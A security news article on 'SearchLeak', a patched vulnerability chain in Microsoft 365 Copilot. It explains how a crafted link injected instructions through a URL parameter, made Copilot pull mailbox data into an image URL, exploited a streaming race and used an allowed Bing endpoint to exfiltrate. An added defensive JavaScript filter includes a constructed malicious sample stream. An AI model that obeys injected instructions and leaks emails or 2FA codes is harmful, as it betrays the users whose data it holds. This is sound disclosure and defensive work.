Vulnerability in Microsoft 365 Copilot Dubbed 'SearchLeak' Patched

Microsoft has patched a critical vulnerability chain named 'SearchLeak' in its M365 Copilot platform. Discovered by security firm Varonis, the exploit could have allowed attackers to exfiltrate sensitive user data, including emails and 2FA codes, with a single click on a crafted URL.

A newly revealed security flaw in Microsoft 365 Copilot shows how a single malicious link could have silently turned the AI assistant into a data exfiltration tool, before Microsoft moved to close the hole.

Discovery and disclosure

In early June, researchers at Varonis Threat Labs uncovered a chained set of three bugs in Microsoft 365 Copilot Enterprise Search, later dubbed “SearchLeak.” The issue, summarized by one report as “a single click on a Microsoft link could have drained your inbox,” allowed an attacker to steal emails, calendar entries, and indexed files with no further interaction from the victim. Microsoft assigned the flaw CVE-2026-42824 on June 4, rating it “critical” under its internal system, and patched it on the Copilot backend last Tuesday, requiring no customer action.

How the SearchLeak chain worked

Varonis’ proof-of-concept showed that an attacker could craft a URL on a legitimate microsoft.com domain, exploiting the q query parameter to inject instructions that Copilot would execute as if they were the user’s own request. This “Parameter-to-Prompt Injection” told Copilot to search a victim’s mailbox, extract sensitive data, and embed it into an image URL—enabling exfiltration in the background while the user saw only a normal page.

A race condition in how Copilot’s responses are streamed let malicious markup execute before Microsoft’s guardrails wrapped the output in safe code blocks, so an injected image tag could fire its outbound request before being neutralized. A server-side request forgery step then abused Bing’s “Search by Image” endpoint—allowed by Microsoft’s own content security policy—to deliver the stolen data to an attacker-controlled server.
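
The streaming race described above is an ordering problem: markup reached the renderer before it was neutralized. The following added JavaScript example (not Microsoft's or Varonis' code) holds back image markup that is split across streamed chunks until it can be neutralized, next to the per-chunk filtering that misses it; the class and function names, the chunk-at-a-time renderer and the sample stream are assumptions.

```javascript
// Added illustration; not Microsoft's or Varonis' code.
// Assumption: the client renders each streamed chunk as it arrives, so image
// markup triggers an outbound request as soon as it is complete.
const IMG_MD = /!\[[^\]]*\]\([^)]*\)/g;             // ![alt](url)
const IMG_HTML = /<img\b[^>]*>/gi;                  // <img ...>
const MD_PARTIAL = /^!(\[[^\]]*(\](\([^)]*)?)?)?$/; // unfinished ![alt](url
const TAG_PARTIAL = /^<[^>]*$/;                     // unfinished <tag

// Images are dropped outright rather than host-allow-listed: in the chain
// described above the request went through an endpoint the CSP already allowed.
function neutralize(text) {
  return text.replace(IMG_MD, "[image removed]").replace(IMG_HTML, "[image removed]");
}

// Index of the first construct that is still open at the end of the buffer.
function safeCut(buf) {
  for (let i = 0; i < buf.length; i++) {
    const c = buf[i];
    if (c !== "!" && c !== "<") continue;
    if ((c === "!" ? MD_PARTIAL : TAG_PARTIAL).test(buf.slice(i))) return i;
  }
  return buf.length;
}

class StreamImageGuard {
  constructor() { this.pending = ""; }
  // Returns only the text that is safe to hand to the renderer now.
  push(chunk) {
    this.pending += chunk;
    const cut = safeCut(this.pending);
    const ready = this.pending.slice(0, cut);
    this.pending = this.pending.slice(cut);
    return neutralize(ready);
  }
  // End of stream: flush, escaping any image tag that never closed.
  end() {
    const rest = neutralize(this.pending).replace(/<(?=img\b)/gi, "&lt;");
    this.pending = "";
    return rest;
  }
}

// Failure mode: filtering each chunk alone misses markup split across chunks.
const filterPerChunk = (chunks) => chunks.map(neutralize);
function filterStream(chunks) {
  const guard = new StreamImageGuard();
  return [...chunks.map((c) => guard.push(c)), guard.end()];
}
// Constructed sample stream; host and value are placeholders.
const SAMPLE = ["Here is your summary. ![", "status](https://collector.example.invalid/p?d=",
  "CONSTRUCTED-VALUE) Done. <im", "g src='https://collector.example.invalid/x'> bye!"];
```

`filterStream(SAMPLE)` emits nothing for the second chunk and releases text only once each image reference is closed and replaced, while `filterPerChunk(SAMPLE)` passes every fragment through unchanged.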

Wider implications for AI security

Security analysts argue the incident highlights a structural weakness in current LLM security: models “are unable to distinguish between instructions provided by users and those snuck into third-party content,” forcing vendors like Microsoft to rely on complex, ad hoc guardrails that attackers can still “catapult over.” The SearchLeak case, which even allowed retrieval of two-factor authentication codes from email, underscores how AI assistants wired into enterprise data can become high-impact attack surfaces if their trust boundaries are not rigorously enforced.
